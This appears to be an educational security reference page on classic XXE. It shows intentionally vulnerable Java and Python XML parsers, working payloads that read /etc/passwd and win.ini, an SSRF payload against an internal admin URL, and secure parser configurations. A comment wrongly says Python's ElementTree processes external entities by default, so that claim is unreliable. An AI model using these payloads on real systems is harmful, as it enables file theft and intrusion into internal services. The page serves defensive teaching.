Skip to content
🔴Critical9.1

Classic XXE (Direct Entity Expansion)

Understanding direct XML external entity attacks where entity content is reflected in the application's response, allowing immediate data exfiltration.

CWE-611A05:2021 – Security Misconfiguration

Overview

Classic XXE (also called in-band XXE) occurs when an XML parser processes external entities and includes their content in the application's response. This is the most straightforward form of XXE attack, where the attacker can immediately see the results of the entity expansion.

When exploited successfully, Classic XXE allows attackers to:

  • Read arbitrary files from the server's filesystem
  • Perform Server-Side Request Forgery (SSRF) attacks
  • Cause Denial of Service (DoS)
  • In some cases, achieve Remote Code Execution

This vulnerability has a CVSS score of 9.1 (Critical) due to its ease of exploitation and severe impact.

How Classic XXE Works

The attack follows these steps:

  1. Attacker crafts malicious XML: Creates an XML document with a DOCTYPE declaration containing an external entity definition
  2. External entity references local resource: The entity points to a file (file:///) or network resource (http://)
  3. Application parses XML: The vulnerable application processes the XML with an insecurely configured parser
  4. Parser retrieves content: The XML parser automatically retrieves the referenced resource
  5. Content reflected in response: The expanded entity content appears in the application's response
  6. Attacker reads data: The attacker extracts sensitive information from the response

Vulnerable Code Examples

These code examples show how XXE vulnerabilities occur when developers parse XML without proper security configuration:

Vulnerable Java Code

JavaVulnerableXmlParser.java⚠️ Vulnerable
1// VULNERABLE CODE - DO NOT USE IN PRODUCTION
2import javax.xml.parsers.DocumentBuilder;
3import javax.xml.parsers.DocumentBuilderFactory;
4import org.w3c.dom.Document;
5import org.xml.sax.InputSource;
6import java.io.StringReader;
7
8public class VulnerableXmlParser {
9    public Document parseXml(String xmlInput) throws Exception {
10        // Default configuration - VULNERABLE!
11        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
12        DocumentBuilder builder = factory.newDocumentBuilder();
13        
14        // This will process external entities by default
15        Document doc = builder.parse(
16            new InputSource(new StringReader(xmlInput))
17        );
18        
19        return doc;
20    }
21}

Vulnerable Python Code

Pythonvulnerable_parser.py⚠️ Vulnerable
1# VULNERABLE CODE - DO NOT USE IN PRODUCTION
2import xml.etree.ElementTree as ET
3
4def parse_xml(xml_string):
5    # Default lxml parsing - VULNERABLE!
6    # External entities are processed by default
7    root = ET.fromstring(xml_string)
8    return root
9
10# Using lxml (also vulnerable by default)
11from lxml import etree
12
13def parse_xml_lxml(xml_string):
14    # VULNERABLE - processes external entities
15    parser = etree.XMLParser()
16    root = etree.fromstring(xml_string, parser)
17    return root

Attack Payload: File Disclosure

This payload demonstrates reading /etc/passwd on Linux systems:

Linux File Disclosure Payload

XML
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3  <!ENTITY xxe SYSTEM "file:///etc/passwd">
4]>
5<root>
6  <data>&xxe;</data>
7</root>

Windows File Disclosure Payload

XML
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
4]>
5<root>
6  <data>&xxe;</data>
7</root>

SSRF Attack Payload

This payload makes the server send a request to an internal network resource:

SSRF Payload Example

XML
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3  <!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
4]>
5<root>
6  <data>&xxe;</data>
7</root>

Expected Response

When the attack succeeds, the application's response will contain the file contents or internal server response:

Vulnerable Response Example

XML
1<root>
2  <data>
3root:x:0:0:root:/root:/bin/bash
4daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5bin:x:2:2:bin:/bin:/usr/sbin/nologin
6sys:x:3:3:sys:/dev:/usr/sbin/nologin
7...
8  </data>
9</root>

Secure Configuration

To prevent XXE attacks, you must explicitly disable external entity processing and DTD processing:

Secure Java Configuration

JavaSecureXmlParser.java✓ Secure
1// SECURE CODE
2import javax.xml.parsers.DocumentBuilder;
3import javax.xml.parsers.DocumentBuilderFactory;
4import org.w3c.dom.Document;
5import org.xml.sax.InputSource;
6import java.io.StringReader;
7
8public class SecureXmlParser {
9    public Document parseXml(String xmlInput) throws Exception {
10        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
11        
12        // Disable DOCTYPE declarations entirely (most secure)
13        factory.setFeature(
14            "http://apache.org/xml/features/disallow-doctype-decl",
15            true
16        );
17        
18        // If you can't disable DOCTYPE, disable external entities
19        factory.setFeature(
20            "http://xml.org/sax/features/external-general-entities",
21            false
22        );
23        factory.setFeature(
24            "http://xml.org/sax/features/external-parameter-entities",
25            false
26        );
27        
28        // Disable external DTDs
29        factory.setFeature(
30            "http://apache.org/xml/features/nonvalidating/load-external-dtd",
31            false
32        );
33        
34        // Disable XInclude
35        factory.setXIncludeAware(false);
36        
37        // Disable expanding entity references
38        factory.setExpandEntityReferences(false);
39        
40        DocumentBuilder builder = factory.newDocumentBuilder();
41        Document doc = builder.parse(
42            new InputSource(new StringReader(xmlInput))
43        );
44        
45        return doc;
46    }
47}

Secure Python Configuration

Pythonsecure_parser.py✓ Secure
1# SECURE CODE
2from lxml import etree
3from defusedxml import ElementTree as DefusedET
4
5# Option 1: Use defusedxml (recommended)
6def parse_xml_safe(xml_string):
7    # defusedxml automatically disables dangerous features
8    root = DefusedET.fromstring(xml_string)
9    return root
10
11# Option 2: Configure lxml securely
12def parse_xml_lxml_safe(xml_string):
13    # Create parser with disabled entity resolution
14    parser = etree.XMLParser(
15        resolve_entities=False,
16        no_network=True,
17        dtd_validation=False,
18        load_dtd=False
19    )
20    root = etree.fromstring(xml_string, parser)
21    return root

Impact and Risk

Classic XXE vulnerabilities have severe security implications:

Confidentiality Impact: HIGH

  • Access to sensitive files (/etc/passwd, /etc/shadow, application config files)
  • Database credentials and API keys
  • Source code and intellectual property
  • User data and PII

Integrity Impact: LOW-MEDIUM

  • Usually limited to data exfiltration
  • Can lead to SSRF attacks that modify internal state

Availability Impact: MEDIUM-HIGH

  • Billion Laughs attack can cause DoS
  • Resource exhaustion from large file reads
  • System crashes from parsing malformed data

Real-World Examples:

  • Reading cloud metadata endpoints (AWS, Azure, GCP)
  • Accessing internal admin panels
  • Exfiltrating database backups
  • Reading application source code

Detection and Testing

To test for Classic XXE vulnerabilities:

  1. Identify XML input points: API endpoints, file uploads, SOAP services
  2. Test with basic payload: Submit XML with external entity referencing a known file
  3. Observe response: Check if file contents appear in the response
  4. Test SSRF: Try referencing an attacker-controlled server to confirm outbound requests
  5. Automated scanning: Use Burp Suite, OWASP ZAP, or custom scripts

Key indicators of vulnerability:

  • Application accepts XML input
  • Response contains expanded entity content
  • Application makes outbound requests to attacker-controlled servers
  • Error messages reveal file paths or entity processing

Remediation Summary

Priority 1 (Critical): Disable DOCTYPE declarations entirely Priority 2 (High): Disable external entity processing Priority 3 (High): Disable DTD processing Priority 4 (Medium): Implement input validation and allowlisting Priority 5 (Medium): Use secure XML parsing libraries (e.g., defusedxml) Priority 6 (Low): Implement WAF rules to detect XXE patterns

Refer to language-specific prevention guides for detailed implementation instructions.